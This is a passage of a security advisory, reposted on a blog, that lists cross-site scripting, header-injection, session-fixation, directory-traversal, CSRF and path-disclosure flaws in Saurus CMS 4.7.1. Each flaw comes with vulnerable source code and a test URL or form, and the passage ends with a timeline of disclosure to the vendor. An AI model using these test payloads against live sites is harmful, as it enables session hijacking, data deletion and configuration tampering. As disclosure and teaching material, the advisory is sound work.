http://localhost/saurus471/admin/permissions.php?user_id="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?group_id="><script>alert(123);</script>
http://localhost/saurus471/admin/permissions.php?role_id="><script>alert(123);</script>


Result: 

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
32. Reflected XSS in "admin/file_source.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied GET parameter "selected_group"
Preconditions:
 1. logged in as Saurus CMS admin

Php script "admin/file_source.php" line 47:
------------------------[ source code start ]----------------------------------
$callback = (string)$_GET['callback'];
..
<?=$callback;?>("<?=str_replace(array('"', "\n", "\r"),
    array('\"', '\n', '\r'), $fcontent);?>");
------------------------[ source code end ]------------------------------------

Test (parameter "file" must be valid):

http://localhost/saurus471/admin/file_source.php?file=public/test.php&callback=alert(123);//

Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
33. Reflected XSS in "admin/change_config.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "flt_keel" and "group"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/change_config.php" line 1220:
------------------------[ source code start ]----------------------------------
<input type=hidden name=flt_keel value="<?=$site->fdat['flt_keel']?>">
..
<input type="hidden" name="group" value="<?=$site->fdat['group']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/change_config.php?group=1&flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/change_config.php?group="><script>alert(123);</script>

Result: 

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
34. Reflected XSS in "admin/forms.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "form_id"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/forms.php" line 222:
------------------------[ source code start ]----------------------------------
if($site->fdat['op'] == 'delete' && $site->fdat['form_id']) {
..
  <input type=hidden name=form_id value="<?=$site->fdat['form_id']?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/forms.php?op=delete&form_id="><script>alert(123);</script>


Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
35. Reflected XSS in "admin/lang_file.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. user-supplied parameter "flt_keel" and "keel_id"
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/lang_file.php" line 204:
------------------------[ source code start ]----------------------------------
$keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id];
..
<input type=hidden name=keel_id value="<?=$keel_id ?>">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/lang_file.php?op=import&flt_keel="><script>alert(123);</script>
http://localhost/saurus471/admin/lang_file.php?op=import&keel_id="><script>alert(123);</script>


Result: 

javascript alert boxes popping up, confirming Reflected XSS vulnerability.


###############################################################################
36. Reflected XSS in "admin/select_group.php"
###############################################################################

Reason:
 1. improper encoding or escaping of output
Attack vector:
 1. all user-supplied parameters (excluding "selected_devices")
Preconditions:
 1. logged in as Saurus CMS admin


Php script "admin/select_group.php" line 442:
------------------------[ source code start ]----------------------------------
foreach($site->fdat as $fdat_field=>$fdat_value) { 
  if($fdat_field != 'selected_devices'){
    echo '<input type=hidden id="selectform_'.$fdat_field.'" 
    name="'.$fdat_field.'" value="'.$fdat_value.'">
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/admin/select_group.php?foobar="><script>alert(123);</script>

Result: 

javascript alert box pops up, confirming Reflected XSS vulnerability.


###############################################################################
37. HTTP Response Splitting  and insecure redirection in "redirect.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied GET parameter "url"
Preconditions:
 1. php version < 4.4.2 or < 5.1.2


Php script "redirect.php" line 100:
------------------------[ source code start ]----------------------------------
if($_GET['url'])
{
  $url = urldecode($_GET['url']);
  //prevent Response Splitting attack
  $url = preg_replace("!\r|\n.*!s", "", $url);
  
  header('Location: '.$_GET['url']);
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/redirect.php?url=war%0d%0axe

Result (using php 5.3.24): 

Warning: Header may not contain more than a single header, new line detected in
C:\apache_www\saurus471\redirect.php on line 106

Test:

http://localhost/saurus471/redirect.php?url=http://php.net/

Result:

successful redirection


###############################################################################
38. HTTP Response Splitting  and insecure redirection in "editor/redirect.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied GET parameter "url"
Preconditions:
 1. php version < 4.4.2 or < 5.1.2


Php script "editor/redirect.php" line 100:
------------------------[ source code start ]----------------------------------
if($_GET['url'])
{
  $url = urldecode($_GET['url']);
  //prevent Response Splitting attack
  $url = preg_replace("!\r|\n.*!s", "", $url);
  
  header('Location: '.$_GET['url']);
------------------------[ source code end ]------------------------------------

Test:

http://localhost/saurus471/editor/redirect.php?url=war%0d%0axe

Result (using php 5.3.24): 

Warning: Header may not contain more than a single header, new line detected in
C:\apache_www\saurus471\editor\redirect.php on line 106

Test:

http://localhost/saurus471/editor/redirect.php?url=http://php.net/

Result:

successful redirection


###############################################################################
39. HTTP Response Splitting in "idcard/index.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied GET and POST parameters "targeturl"
Preconditions:
 1. HTTPS connection needed ("SSLRequireSSL" directive in ".htaccess" file)
 2. php version < 4.4.2 or < 5.1.2


Php script "idcard/index.php" line 9:
------------------------[ source code start ]----------------------------------
if($_GET['targeturl']) { $targeturl = '?target_url='.$_GET['targeturl']; }
elseif($_POST['targeturl']) { $targeturl = '?target_url='.$_POST['targeturl']; }


header('Location: ../idcard.php'.$targeturl);
------------------------[ source code end ]------------------------------------


###############################################################################
40. HTTP Response Splitting in "admin/lang_file.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameters "flt_keel" and "keel_id"
Preconditions:
 1. php version < 4.4.2 or < 5.1.2
 2. logged in as Saurus CMS admin


Php script "admin/lang_file.php" line 44:
------------------------[ source code start ]----------------------------------
$keel_id = isset($site->fdat[flt_keel]) ? $site->fdat[flt_keel] : $site->fdat[keel_id];
..
if ($site->fdat['op'] == 'export' && $site->fdat['op2'] == 'salvesta'){

  header("Content-Disposition: attachment; filename=\"language".$keel_id.".csv\"");
------------------------[ source code end ]------------------------------------

Tests:

http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&flt_keel=%0d%0a
http://localhost/saurus471/admin/lang_file.php?op=export&op2=salvesta&keel_id=%0d%0a

Result (using php 5.3.24, from errorlog): 

Header may not contain more than a single header, new line detected


###############################################################################
41. HTTP Response Splitting in "admin/publish.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameter "url"
Preconditions:
 1. php version < 4.4.2 or < 5.1.2
 2. logged in as Saurus CMS user with publish privileges


Php script "admin/publish.php" line 118:
------------------------[ source code start ]----------------------------------
header("Location: ".(empty($_SERVER['HTTPS']) ? 'http://' : 'https://').$site->CONF[hostname].$site->fdat[url]);
------------------------[ source code end ]------------------------------------


###############################################################################
42. HTTP Response Splitting in "add_comment.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameters "tpl", "c_tpl", "id", "redirect_url"
Preconditions:
 1. php version < 4.4.2 or < 5.1.2


Php script "add_comment.php" line 135:
------------------------[ source code start ]----------------------------------
header('Location: '.urldecode(preg_replace("!\r|\n.*!s", "", $_POST['redirect_url'])).'&lisa_alert=2');
..
header('Location: '.(empty($_SERVER['HTTPS']) ? 'http://': 
'https://').$site->CONF['hostname'].$site->CONF['wwwroot'].
($site->in_editor?'/editor':'').'/?'.(($site->fdat['tpl'] || 
$site->fdat['c_tpl'])&&!$site->fdat['inserted_id']&&
!$site->fdat['jump_to_parent']?'tpl='.$site->fdat['tpl'].
'&c_tpl='.$site->fdat['c_tpl'].'&':'').'id='.$site->fdat['id'].'&lisa_alert=2');
..
if ($site->fdat['output_device'] == 'pda') {
  if (strlen($site->fdat['text']) < 2 || strlen($site->fdat['nimi']) < 2) {
    myRedirect($site->fdat['redirect_url']);
..
header("Location: ".urldecode($site->fdat['redirect_url']));
..
function myRedirect($url) {
..
  header("Location: " . urldecode($url));
}
------------------------[ source code end ]------------------------------------


###############################################################################
43. Information leakage in "admin/check_requirements.php"
###############################################################################

Reason: insufficient access control

Test:

http://localhost/saurus471/admin/check_requirements.php

Result:

Simple GET request as shown above reveals some information about web server:
MySQL version, Webserver version, PHP version, multiple php setting values,
multiple directory permissions. Anyone can access this diagnostic script, no
access control exist.


###############################################################################
44. Session Fixation vulnerability in "admin/ajax_response.php"
###############################################################################

Attack vector:
 1. user-supplied POST parameter "PHPSESSID"
Preconditions: none

Some years ago PHP session fixation attacks were easy to exploit: just add
PHPSESSID=112233445566 to URI and done. Modern PHP versions are more secure by
default: PHP setting "session.use_only_cookies" defaults to "1" since 5.3.0,
"session.use_trans_sid" defaults to "0". So even if PHP-based web application
does have session fixation vulnerability, many real world installations are hard
to exploit. Now let's look at Saurus CMS source code.

Php script "admin/ajax_response.php" line 27:
------------------------[ source code start ]----------------------------------
if(isset($_POST['PHPSESSID']))
{
  session_id($_POST['PHPSESSID']);
  session_start();
}
------------------------[ source code end ]------------------------------------

We can see, that user-submitted POST parameter PHPSESSID is used as argument for
PHP function "session_id()", which is followed by "session_start()". It means,
that even if "session.use_only_cookies=1" and "session.use_trans_sid=0", session
fixation attacks are possible.

Test:

<html><body><center>
<form action="http://localhost/saurus471/admin/ajax_response.php" method="post">
<input type="hidden" name="PHPSESSID" value="1122334455667788">
<input type="submit" value="Test">
</form>
</center></body></html>

Press "Test button" and then observe server response:

HTTP/1.1 200 OK
Date: Wed, 05 Jun 2013 10:26:19 GMT
Server: Apache/2.2.22 (Win32) DAV/2 mod_ssl/2.2.22 OpenSSL/0.9.8t
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=1122334455667788; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript

Now log in as Saurus CMS admin and look for session cookies:

GET /saurus471/admin/index.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: logged=1; PHPSESSID=1122334455667788
Connection: keep-alive

We can see, that after authentication session ID does not change, which indicates
Session Fixation vulnerability existence.

Solution: implement session ID renewal after successful user authentication.


###############################################################################
45. Directory Traversal vulnerability in "admin/ajax_response.php"
###############################################################################

Reason:
 1. insufficient sanitization of user-supplied data
Attack vector:
 1. user-supplied parameter "name"
Preconditions:
 1. logged in as valid Saurus CMS user
Result: logged in Saurus CMS user can test existence of arbitrary files on
remote server filesystem.


Php script "admin/ajax_response.php" line 52:
------------------------[ source code start ]----------------------------------
// check if a file exists
if($site->user->user_id && $_REQUEST['op'] == 'check_file' && $site->fdat['name'])
{
  include_once($class_path.'adminpage.inc.php');
  
  $pathinfo = str_replace(array('../', './', '..\\', '.\\'), '', $site->fdat['name']);
  $pathinfo = explode('/', $pathinfo);
  $filename = create_alias_from_string($pathinfo[count($pathinfo) - 1],true);
  unset($pathinfo[count($pathinfo) - 1]);
  $dirname = implode('/', $pathinfo);
  
  if(file_exists($site->absolute_path.$dirname.'/'.$filename))
  {
    echo '{"file_exists": 1}';
  }
  else 
  {
    echo '{"file_exists": 0}';
  }
------------------------[ source code end ]------------------------------------

As seen above, php function "str_replace()" is used for filtering out possible
directory traversal substrings. Such filtering is not secure enough and can be
bypassed with specially crafted parameter "name".


Test 1:

http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/foobar.txt

Result: {"file_exists": 0}

Test 2:

http://localhost/saurus471/admin/ajax_response.php?op=check_file&name=..././..././/..././..././/..././..././/test.txt

Result: {"file_exists": 1}


###############################################################################
46. Cross-Site Request Forgery in "admin/trash.php"
###############################################################################

Reason:
 1. missing CSRF token checks
Result:
 1. Unauthorized deletion of objects from Recycle Bin
 

Php script "admin/trash.php" line 85:
------------------------[ source code start ]----------------------------------
if($site->fdat['delete_all'] && count($site->fdat['objects']))
{
  //empty trash
  for($i = count($site->fdat['objects']) - 1; $i >= 0; $i--)
  {
    foreach($site->fdat['objects'][$i] as $object_id => $values) if($object_id)
    {
      $delete_objs = new Alamlist(array(
        'parent' => $object_id,
        'klass' => $classes,
      ));
      
      while($object = $delete_objs->next())
      {
        $object->del();
------------------------[ source code end ]------------------------------------

As seen above, there is no protection against CSRF.

Test:

http://localhost/saurus471/admin/trash.php?delete_all=1&objects[]=1

Result (from sitelog): "Recycle Bin emptied"

Solution: use "verify_form_token()" function in critical places


###############################################################################
47. Cross-Site Request Forgery in "admin/change_config.php"
###############################################################################

Reason:
 1. missing CSRF token checks
Result:
 1. Unauthorized modification of site configuration
 

Php script "admin/change_config.php" line 85:
------------------------[ source code start ]----------------------------------
if ($site->fdat[salvesta]==1) {
  foreach ($site->fdat as $key=>$value) {

    if ( substr ($key, 0, 4) == "cff_" ) {
      $sql = $site->db->prepare("UPDATE config SET sisu=? WHERE nimi=?", $value, substr ($key, 4));
      $sth = new SQL($sql);
------------------------[ source code end ]------------------------------------

We can see, that there is no protection against CSRF.

Tests:

http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=0
http://localhost/saurus471/admin/change_config.php?salvesta=1&cff_save_error_log=1

Result:
 
Saurus CMS configuration setting "save_error_log" has been changed

Solution: use "verify_form_token()" function in critical places


###############################################################################
48. Cross-Site Request Forgery in "admin/forms.php"
###############################################################################

Reason:
 1. missing CSRF token checks
Result:
 1. Unauthorized deletion of forms
 

Php script "admin/forms.php" line 137:
------------------------[ source code start ]----------------------------------
if($site->fdat['op2'] == 'deleteconfirmed' && $site->fdat['form_id']) {

  # delete form
  $sql = $site->db->prepare("DELETE FROM forms WHERE form_id=?",$site->fdat['form_id']);
  $sth = new SQL($sql);
------------------------[ source code end ]------------------------------------

We can see, that there is no protection against CSRF.

Test:

http://localhost/saurus471/admin/forms.php?op2=deleteconfirmed&form_id=5

Result (from sitelog): "Form 'testform' deleted"

Solution: use "verify_form_token()" function in critical places


###############################################################################
49. Full Path Disclosure in multiple scripts
###############################################################################

Preconditions:
  1. PHP setting "display_errors = On"

Tests:

http://localhost/saurus471/admin/edit_object.php

Fatal error: Call to a member function msg() on a non-object in
C:\apache_www\saurus471\admin\edit_object.php on line 1299

http://localhost/saurus471/admin/edit_pilt.php

Fatal error: Class 'Timer' not found in
C:\apache_www\saurus471\admin\edit_pilt.php on line 21

http://localhost/saurus471/admin/templates.php

Fatal error: Call to a member function msg() on a non-object in
C:\apache_www\saurus471\admin\templates.php on line 57


Disclosure timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

06.06.2013 -> First email to vendor
06.06.2013 -> First response email from vendor
06.06.2013 -> Sending detailed information to vendor
07.06.2013 -> Vendor started fixing found problems
21.06.2013 -> Found problems are fixed
14.07.2013 -> Current advisory released


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------
Rate this post
Брой прочитания на тази страница: 1057
Saurus CMS 4.7.1 – Multiple Vulnerabilities
Tagged on:         

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *